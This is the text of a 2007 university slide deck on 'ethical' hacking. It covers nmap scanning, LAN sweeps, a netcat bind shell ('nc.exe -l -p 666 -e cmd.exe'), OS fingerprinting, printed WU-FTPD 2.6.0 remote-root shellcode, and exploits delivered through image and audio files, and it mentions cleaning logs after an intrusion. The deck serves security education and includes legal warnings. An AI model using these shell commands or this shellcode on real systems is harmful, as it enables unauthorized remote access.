Security & “Ethical” Hacking

Security & “Ethical” Hacking Luke Arntson Central Washington University Winter 2007 Presentation #2 – Advanced Scanning & Exploitation

Introduction • Again “Ethical” hacking • Do you Sniffbefore you taste? • Patience, persistence, some other motivational p word… • Have phun, getting frustrated is normal

About Me

Overview • Advanced scanning with NMAP (as seen in the Matrix) • LocalIP Sweeping & its importance • Netcat rooting, a simple shell • Identify Station( operating system ) • Brief Exploit talk & Shell code • Exploits via Jpgs, Pngs, Mp3s, etc. • Conclusion

Advanced Scanning (NMAP) • Ok, we have acquired an IP (or range of) and we want to find out some information about this system. • We will use a very popular program named Nmap. • Almost every Linux install its packaged, Windows you will need to download Nmap and the Win-Pcap files.

Advanced Scanning (NMAP) • Lets look at some of the information techniques provided by nmap SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idlescan -sO: IP protocol scan -b <ftp relay host>: FTP bounce scan • We will be using another scan technique to probe open ports and determine service/versions in use: -sV

Advanced Scanning (NMAP) • So lets run a -sV scan along with -v for verbose and -O for OS detection

Advanced Scanning (NMAP) • So lots of gibberish, but we can sort through this for VERY important details! • First: we have all of the open ports, along with what versions they are running! Port 139.. Very interesting. • Second: we also found out the operating system! Windows 98 SE… that will be later.

Protection from NMAP • Keep those firewalls up if you’re not a server and you’re not hosting. • There is not much you can do.. and NMAP can be extremely stealthy using advanced techniques. • It is scary how much information can be acquired about you by a simple sniff and run.

Local IP Sweeping • The LAN is the weakest network generally • Open ports, open boxes, free IPs, easy sweeps • Vast majority of people feel other computers within the LAN are not hackers, but compromise a wireless router & bam…

Using Angry IP Scanner Again! • Angry IP Scanner; Its script kiddie, but it works very well, and is faster than NMAP • Lets grab our local IP on the network, and begin our scan, so we are currently 192.168.5.100, and we know our range is 192.168.5.* • Use Angry IP Scanner just to find available peers on the network, this is VERY useful for a compromised wireless router or compromised system on a router

We Have Local Victims! • Okay, we have local victims, we can now use Nmap on each victim. • Nmap will also bypass firewalls given enough time with the –P0 option. • Once we know operating systems, open ports, we can use online security search tools such as www.securityfocus.com and locate exploits!

Importance of Local Sweeps • Compromised routers = compromised systems, vulnerable on the inside only. • Apply a full control root kit to a computer behind a router, and you have LAN access… hence local IP sweeping • Viruses often spread within a network (commercial, government, etc.) using LAN sweeps

Netcat Rooting (Simple Shell) • Ok, we want to see what kind of access a shell really has on a system. • Shell referring to a command prompt window on another computer. • Netcat is a very useful UDP/TCP raw client/server that can also double as a nice shell. • A windows version is free to download, Linux generally comes with NC in the shell already.

Client/Server • Determine which computer you want to have a shell on, and put nc.exe somewhere on there. • Next run nc.exe with the following parameters: nc.exe –l –p 666 –e “cmd.exe” • This will execute Netcat to listen on port 666, and when connected, it will execute and send the output of cmd.exe on the server.

Client Connection • Client now connects to the server using the corresponding line: nc.exe 192.168.77.2 666 • And Viola! Netcat shell over the network.

Why Netcat Root? • A nice way to make your first root, easy to expand on this. • Potential is HUGE when the –e “???” command is used. • Netcat is open source, so you can venture the source code to understand how exactly Netcat does this. • This also works in Unix, just replace cmd.exe with a Unix shell ;)

Identify Station • Continuation of Nmap OS discovery • Once we have found a target, what kind of operating system is it running? • Nmap -O command will usually show you, unless the computer has a firewall on.

Importance of OS ID • Exploiting and choice of exploits/roots is always dependent on the type of OS • Do we want to look for likely exploits, find a more aggressive approach, or leave it. • For example, Linux servers often have a SSH server open, we can either nmap –sV and exploit, or try to bruteforce. • Need to know what we are trying to hack, especially when cleaning up after a successful hack (log files, email reports of floods / bruteforce, rootkits, etc.)

Brief Exploits & Shell Code • Exploits come in all sorts of languages & sizes. Some are simple run once on an IP, others have various options and offsets. • Exploits are used as a way of getting into a system, shell code is what happens AFTER the exploit is successful. • Shell code will always vary with experienced hackers, as they will always have useful shells on hand.

Example Shellcode used by WUFTPD 2.6.0 REMOTE ROOT EXPLOIT • char linuxcode[]= /* Lam3rZ chroot() code */ "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; • This is machinecode, used to give specific calls in Linux that will call chroot() and give the hacker a shell on the vulnerable system. • This is public knowledge, just type the following in Google: wuftpd exploit filetype:c

More on Shells Later • Creating shells is an entirely different topic, and we will go into how they actually figure out which machine code to use and where to inject this in a later presentation. • Shells are scary to look at because if you do not know the machine code or the system its intended for, there is absolutely no way to know what its doing, but it can compromise a system!

Exploits via Jpg, Pngs, Mp3s • Exploits come in many varieties, as it just takes a stray string call or a bad sizecheck to make a program vulnerable. • All sorts of formats have been vulnerable, for example the famous GDI+ Jpg vulnerability that would execute code just by viewing a jpg!

GDI+ Jpg vulnerability Posted on Sept. 30, 2004 • “In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing user's computer is then infected. Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing. “ – Mark Joseph Edwards • http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1

Exploits via Jpg, Pngs, Mp3s • Other vulnerabilities in the form of Pngs and Mp3s have come into the wild. • One Mp3 would use the header to execute a shell in Winamp when the meta-data was loaded. • A Png exploit in MSN Messenger would allow hackers to put shellcode in a Png and display it as a buddy icon to other users.

Just because its media… • Just because you’re viewing a jpg, png, mp3, wmv, you could still be running something that exploits your computer. • Many people think exploits come in very limited forms of scripts, tcp/udp injections or executables, but there are many ways in.

Resources • If this type of information interests you, there are many safe online resources. • www.hackthissite.org - a friendly playground for web hackers • www.phrack.org - a very good place for random articles with great pieces of info • www.securityfocus.com - some of the best up-to-date info about vulnerabilities and exploits.

Conclusion • Again, I emphasize just because I’m showing you this, does NOT make it legal. • In fact, scanning government systems with NMAP and getting caught can land you with fines & possible jail time. Running exploits with shellcode you do not trust could be potentially exposing your test system to a wild virus or backdoor you do not know about. • Remember, finding exploits that work is tedious, not everything you find online works every time. Setup a fun box (something like Mandrake) and install some vulnerable software on there. See if you can break into it. Ex. Wuftpd 2.60. Have fun, it takes work so don’t give up!

Thank You For Your Time! Feel free to email me any questions/comments at arntsonl@cwu.edu

Security & “Ethical” Hacking